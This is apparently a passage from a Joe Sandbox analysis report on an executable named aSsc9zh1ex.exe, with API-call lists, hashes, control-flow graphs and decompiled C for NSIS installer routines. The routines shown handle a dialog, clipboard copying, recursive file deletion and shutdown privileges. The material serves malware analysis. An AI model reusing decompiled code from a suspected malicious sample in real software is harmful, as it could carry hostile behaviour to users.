                                                                                                                              • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
                                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\aSsc9zh1ex.exe,0079F708,00000001), ref: 004039EB
                                                                                                                              • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000), ref: 00403A18
                                                                                                                              • OleUninitialize.OLE32(?), ref: 00403A3B
                                                                                                                              • ExitProcess.KERNEL32 ref: 00403A55
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
                                                                                                                              • ExitProcess.KERNEL32 ref: 00403AE9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                              • String ID: "C:\Users\user\Desktop\aSsc9zh1ex.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\aSsc9zh1ex.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                              • API String ID: 3859024572-3609854827
                                                                                                                              • Opcode ID: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
                                                                                                                              • Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
                                                                                                                              • Opcode Fuzzy Hash: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
                                                                                                                              • Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004056BB Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 143 4056bb-4056d6 144 405865-40586c 143->144 145 4056dc-4057a3 GetDlgItem * 3 call 4044ab call 404e04 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405896-4058a3 144->147 148 40586e-405890 GetDlgItem CreateThread CloseHandle 144->148 166 4057c1-4057c4 145->166 167 4057a5-4057bf SendMessageW * 2 145->167 150 4058c1-4058cb 147->150 151 4058a5-4058ab 147->151 148->147 155 405921-405925 150->155 156 4058cd-4058d3 150->156 153 4058e6-4058ef call 4044dd 151->153 154 4058ad-4058bc ShowWindow * 2 call 4044ab 151->154 163 4058f4-4058f8 153->163 154->150 155->153 159 405927-40592d 155->159 161 4058d5-4058e1 call 40444f 156->161 162 4058fb-40590b ShowWindow 156->162 159->153 168 40592f-405942 SendMessageW 159->168 161->153 164 40591b-40591c call 40444f 162->164 165 40590d-405916 call 40557c 162->165 164->155 165->164 172 4057d4-4057eb call 404476 166->172 173 4057c6-4057d2 SendMessageW 166->173 167->166 174 405a44-405a46 168->174 175 405948-405973 CreatePopupMenu call 406557 AppendMenuW 168->175 182 405821-405842 GetDlgItem SendMessageW 172->182 183 4057ed-405801 ShowWindow 172->183 173->172 174->163 180 405975-405985 GetWindowRect 175->180 181 405988-40599d TrackPopupMenu 175->181 180->181 181->174 185 4059a3-4059ba 181->185 182->174 184 405848-405860 SendMessageW * 2 182->184 186 405810 183->186 187 405803-40580e ShowWindow 183->187 184->174 188 4059bf-4059da SendMessageW 185->188 189 405816-40581c call 4044ab 186->189 187->189 188->188 190 4059dc-4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->182 192 405a01-405a28 SendMessageW 190->192 192->192 193 405a2a-405a3e GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E004056BB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a44;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040564F, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406557(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f48;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a2c == _t156) {
							ShowWindow( *0x7a8a68, 8);
							if( *0x7a8aec == _t156) {
								_t119 =  *0x7a0f20; // 0x8e3734
								E0040557C( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040444F(_t171);
							goto L25;
						}
						 *0x7a0718 = 2;
						E0040444F(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044DD(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a30, _t156);
						ShowWindow(_t169, 8);
						E004044AB(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8a70;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a30 = GetDlgItem(_a4, 0x403);
				 *0x7a7a28 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a44 = _t134;
				_v8 = _t134;
				E004044AB( *0x7a7a30);
				 *0x7a7a34 = E00404E04(4);
				 *0x7a7a4c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404476(_a4);
				if(( *0x7a8a78 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a30, _t156);
					if(( *0x7a8a78 & 0x00000002) != 0) {
						 *0x7a7a30 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044AB( *0x7a7a28);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8a78 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                                                                                              0x004056c3
                                                                                                                              0x004056c9
                                                                                                                              0x004056d3
                                                                                                                              0x004056d6
                                                                                                                              0x0040586c
                                                                                                                              0x00405889
                                                                                                                              0x00405890
                                                                                                                              0x00405890
                                                                                                                              0x004058a3
                                                                                                                              0x004058c1
                                                                                                                              0x004058c3
                                                                                                                              0x004058cb
                                                                                                                              0x00405921
                                                                                                                              0x00405925
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405927
                                                                                                                              0x0040592d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405937
                                                                                                                              0x0040593f
                                                                                                                              0x00405942
                                                                                                                              0x00405a44
                                                                                                                              0x00000000
                                                                                                                              0x00405a44
                                                                                                                              0x00405951
                                                                                                                              0x0040595c
                                                                                                                              0x00405965
                                                                                                                              0x00405970
                                                                                                                              0x00405973
                                                                                                                              0x0040597c
                                                                                                                              0x00405982
                                                                                                                              0x00405985
                                                                                                                              0x00405985
                                                                                                                              0x0040599d
                                                                                                                              0x004059a6
                                                                                                                              0x004059a9
                                                                                                                              0x004059b0
                                                                                                                              0x004059b7
                                                                                                                              0x004059bf
                                                                                                                              0x004059bf
                                                                                                                              0x004059d6
                                                                                                                              0x004059d6
                                                                                                                              0x004059dd
                                                                                                                              0x004059e3
                                                                                                                              0x004059ef
                                                                                                                              0x004059f6
                                                                                                                              0x004059ff
                                                                                                                              0x00405a01
                                                                                                                              0x00405a04
                                                                                                                              0x00405a13
                                                                                                                              0x00405a16
                                                                                                                              0x00405a1c
                                                                                                                              0x00405a1d
                                                                                                                              0x00405a23
                                                                                                                              0x00405a24
                                                                                                                              0x00405a25
                                                                                                                              0x00405a2d
                                                                                                                              0x00405a38
                                                                                                                              0x00405a3e
                                                                                                                              0x00405a3e
                                                                                                                              0x00000000
                                                                                                                              0x0040599d
                                                                                                                              0x004058d3
                                                                                                                              0x00405903
                                                                                                                              0x0040590b
                                                                                                                              0x0040590d
                                                                                                                              0x00405916
                                                                                                                              0x00405916
                                                                                                                              0x0040591c
                                                                                                                              0x00000000
                                                                                                                              0x0040591c
                                                                                                                              0x004058d7
                                                                                                                              0x004058e1
                                                                                                                              0x00000000
                                                                                                                              0x004058a5
                                                                                                                              0x004058ab
                                                                                                                              0x004058e6
                                                                                                                              0x00000000
                                                                                                                              0x004058ef
                                                                                                                              0x004058b4
                                                                                                                              0x004058b9
                                                                                                                              0x004058bc
                                                                                                                              0x00000000
                                                                                                                              0x004058bc
                                                                                                                              0x004058a3
                                                                                                                              0x004056dc
                                                                                                                              0x004056e0
                                                                                                                              0x004056e8
                                                                                                                              0x004056ec
                                                                                                                              0x004056ef
                                                                                                                              0x004056f2
                                                                                                                              0x004056f5
                                                                                                                              0x004056f8
                                                                                                                              0x004056f9
                                                                                                                              0x004056fa
                                                                                                                              0x00405713
                                                                                                                              0x00405716
                                                                                                                              0x00405720
                                                                                                                              0x0040572f
                                                                                                                              0x00405737
                                                                                                                              0x0040573f
                                                                                                                              0x00405744
                                                                                                                              0x00405747
                                                                                                                              0x00405753
                                                                                                                              0x0040575c
                                                                                                                              0x00405765
                                                                                                                              0x00405787
                                                                                                                              0x0040578d
                                                                                                                              0x0040579e
                                                                                                                              0x004057a3
                                                                                                                              0x004057b1
                                                                                                                              0x004057bf
                                                                                                                              0x004057bf
                                                                                                                              0x004057c4
                                                                                                                              0x004057d2
                                                                                                                              0x004057d2
                                                                                                                              0x004057d7
                                                                                                                              0x004057da
                                                                                                                              0x004057df
                                                                                                                              0x004057eb
                                                                                                                              0x004057f4
                                                                                                                              0x00405801
                                                                                                                              0x00405810
                                                                                                                              0x00405803
                                                                                                                              0x00405808
                                                                                                                              0x00405808
                                                                                                                              0x0040581c
                                                                                                                              0x0040581c
                                                                                                                              0x00405830
                                                                                                                              0x00405839
                                                                                                                              0x00405842
                                                                                                                              0x00405852
                                                                                                                              0x0040585e
                                                                                                                              0x0040585e
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405719
                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405728
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405765
                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 0040576C
                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057F4
                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405808
                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405829
                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405737
                                                                                                                                • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040587B
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000564F,00000000), ref: 00405889
                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405890
                                                                                                                              • ShowWindow.USER32(00000000), ref: 004058B4
                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004058B9
                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405903
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
                                                                                                                              • CreatePopupMenu.USER32 ref: 00405948
                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040595C
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040597C
                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004059DD
                                                                                                                              • EmptyClipboard.USER32 ref: 004059E3
                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004059F9
                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A38
                                                                                                                              • CloseClipboard.USER32 ref: 00405A3E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                              • String ID: {
                                                                                                                              • API String ID: 590372296-366298937
                                                                                                                              • Opcode ID: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
                                                                                                                              • Instruction ID: d7cac64708ae36737aaf404740c8a4e4a0ccfdbfd79e04772bb75515dd65aeb5
                                                                                                                              • Opcode Fuzzy Hash: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
                                                                                                                              • Instruction Fuzzy Hash: BFB14BB1900608FFDF11AF64DD89AAE7B79FB48354F00802AFA41B61A0CB795A51DF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405C26 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 442 405c26-405c4c call 405ef1 445 405c65-405c6c 442->445 446 405c4e-405c60 DeleteFileW 442->446 448 405c6e-405c70 445->448 449 405c7f-405c8f call 40651a 445->449 447 405de2-405de6 446->447 450 405d90-405d95 448->450 451 405c76-405c79 448->451 455 405c91-405c9c lstrcatW 449->455 456 405c9e-405c9f call 405e35 449->456 450->447 454 405d97-405d9a 450->454 451->449 451->450 457 405da4-405dac call 406850 454->457 458 405d9c-405da2 454->458 460 405ca4-405ca8 455->460 456->460 457->447 466 405dae-405dc2 call 405de9 call 405bde 457->466 458->447 463 405cb4-405cba lstrcatW 460->463 464 405caa-405cb2 460->464 465 405cbf-405cdb lstrlenW FindFirstFileW 463->465 464->463 464->465 467 405ce1-405ce9 465->467 468 405d85-405d89 465->468 482 405dc4-405dc7 466->482 483 405dda-405ddd call 40557c 466->483 470 405d09-405d1d call 40651a 467->470 471 405ceb-405cf3 467->471 468->450 473 405d8b 468->473 484 405d34-405d3f call 405bde 470->484 485 405d1f-405d27 470->485 474 405cf5-405cfd 471->474 475 405d68-405d78 FindNextFileW 471->475 473->450 474->470 478 405cff-405d07 474->478 475->467 481 405d7e-405d7f FindClose 475->481 478->470 478->475 481->468 482->458 486 405dc9-405dd8 call 40557c call 4062da 482->486 483->447 495 405d60-405d63 call 40557c 484->495 496 405d41-405d44 484->496 485->475 487 405d29-405d32 call 405c26 485->487 486->447 487->475 495->475 497 405d46-405d56 call 40557c call 4062da 496->497 498 405d58-405d5e 496->498 497->475 498->475
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E00405C26(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EF1(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8ae8 =  *0x7a8ae8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040651A(0x7a3f50, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E35(_t68);
					} else {
						lstrcatW(0x7a3f50, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f50,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040651A(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BDE(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040557C(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8ae8 =  *0x7a8ae8 + 1;
										} else {
											E0040557C(0xfffffff1, _t68);
											E004062DA(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C26(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x7a3f50 - 0x5c;
					if( *0x7a3f50 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406850(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DE9(_t68);
							_t38 = E00405BDE(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040557C(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040557C(0xfffffff1, _t68);
							return E004062DA(_t67, _t68, 0);
						}
						L30:
						 *0x7a8ae8 =  *0x7a8ae8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                                                              0x00405c30
                                                                                                                              0x00405c35
                                                                                                                              0x00405c3e
                                                                                                                              0x00405c41
                                                                                                                              0x00405c49
                                                                                                                              0x00405c4c
                                                                                                                              0x00405c4f
                                                                                                                              0x00405c57
                                                                                                                              0x00405c59
                                                                                                                              0x00405c5a
                                                                                                                              0x00000000
                                                                                                                              0x00405c5a
                                                                                                                              0x00405c65
                                                                                                                              0x00405c68
                                                                                                                              0x00405c68
                                                                                                                              0x00405c68
                                                                                                                              0x00405c6c
                                                                                                                              0x00405c7f
                                                                                                                              0x00405c86
                                                                                                                              0x00405c8b
                                                                                                                              0x00405c8f
                                                                                                                              0x00405c9f
                                                                                                                              0x00405c91
                                                                                                                              0x00405c97
                                                                                                                              0x00405c97
                                                                                                                              0x00405ca4
                                                                                                                              0x00405ca8
                                                                                                                              0x00405cb4
                                                                                                                              0x00405cba
                                                                                                                              0x00405cbf
                                                                                                                              0x00405cc5
                                                                                                                              0x00405cd0
                                                                                                                              0x00405cd6
                                                                                                                              0x00405cd8
                                                                                                                              0x00405cdb
                                                                                                                              0x00405d85
                                                                                                                              0x00405d85
                                                                                                                              0x00405d89
                                                                                                                              0x00405d8b
                                                                                                                              0x00405d8b
                                                                                                                              0x00405d8b
                                                                                                                              0x00405d8b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405ce1
                                                                                                                              0x00405ce1
                                                                                                                              0x00405ce1
                                                                                                                              0x00405ce9
                                                                                                                              0x00405d09
                                                                                                                              0x00405d11
                                                                                                                              0x00405d16
                                                                                                                              0x00405d1d
                                                                                                                              0x00405d38
                                                                                                                              0x00405d3d
                                                                                                                              0x00405d3f
                                                                                                                              0x00405d63
                                                                                                                              0x00405d41
                                                                                                                              0x00405d41
                                                                                                                              0x00405d44
                                                                                                                              0x00405d58
                                                                                                                              0x00405d46
                                                                                                                              0x00405d49
                                                                                                                              0x00405d51
                                                                                                                              0x00405d51
                                                                                                                              0x00405d44
                                                                                                                              0x00405d1f
                                                                                                                              0x00405d25
                                                                                                                              0x00405d27
                                                                                                                              0x00405d2d
                                                                                                                              0x00405d2d
                                                                                                                              0x00405d27
                                                                                                                              0x00000000
                                                                                                                              0x00405d1d
                                                                                                                              0x00405ceb
                                                                                                                              0x00405cf3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405cf5
                                                                                                                              0x00405cfd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405cff
                                                                                                                              0x00405d07
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405d68
                                                                                                                              0x00405d70
                                                                                                                              0x00405d76
                                                                                                                              0x00405d76
                                                                                                                              0x00405d7f
                                                                                                                              0x00000000
                                                                                                                              0x00405d7f
                                                                                                                              0x00405caa
                                                                                                                              0x00405cb2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405c6e
                                                                                                                              0x00405c6e
